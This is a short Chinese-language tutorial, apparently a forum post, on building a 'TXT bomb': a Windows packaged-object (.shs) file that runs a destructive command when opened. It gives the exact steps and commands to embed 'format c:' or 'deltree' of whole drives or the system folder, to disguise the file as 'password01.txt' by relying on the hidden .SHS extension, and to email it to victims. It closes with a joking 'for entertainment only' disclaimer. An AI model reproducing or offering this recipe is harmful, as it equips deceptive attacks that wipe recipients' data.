TXT炸彈的制作 [color=deeppink][/color]
1.創建一個只包含一個空格(
為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板文檔}單欄中的“插入\對象”,彈出“插入對象”對話框,選中“從文件創建”,然後
點擊“浏覽”按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的“編輯\包對象\編輯包”(如圖1)。在彈出的“對象包裝程序”對話框中,選擇菜單欄中的“編輯\命令行”,然後輸入如下命令
:start.exe /m format c:/q /autotest /u ,點擊“確定”,此時,內容欄中會顯示出命令內容。
4.點擊外觀欄中的“插入圖標”按鈕,會彈出一個警告對話框,確認,然後任選一個圖標。
5.選擇菜單欄中的“編輯\卷標”,為此嵌入對象取一個名稱(會替換原來的文件名稱)。點擊“文件”菜單中的“更新”,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是“碎片”(在2000下的默認名為"片段"),現在我們把它改成“password01.txt”。打開電子郵件程序將桌面
上的“password01.txt”作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作為附件發出。
7.當郵件接收者誤將“password01.txt.shs”文件作為“password01.txt”(如前文所述,“.SHS”擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對方硬盤下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe /m deltree /y c:\windows\system\*.* 則是刪除對方c:\windows\system\目錄底下的所有文件.(當然大家可以改成其它的命令)
很簡單,這樣一個惡意的攻擊程序被弄出來了!(僅供娛樂)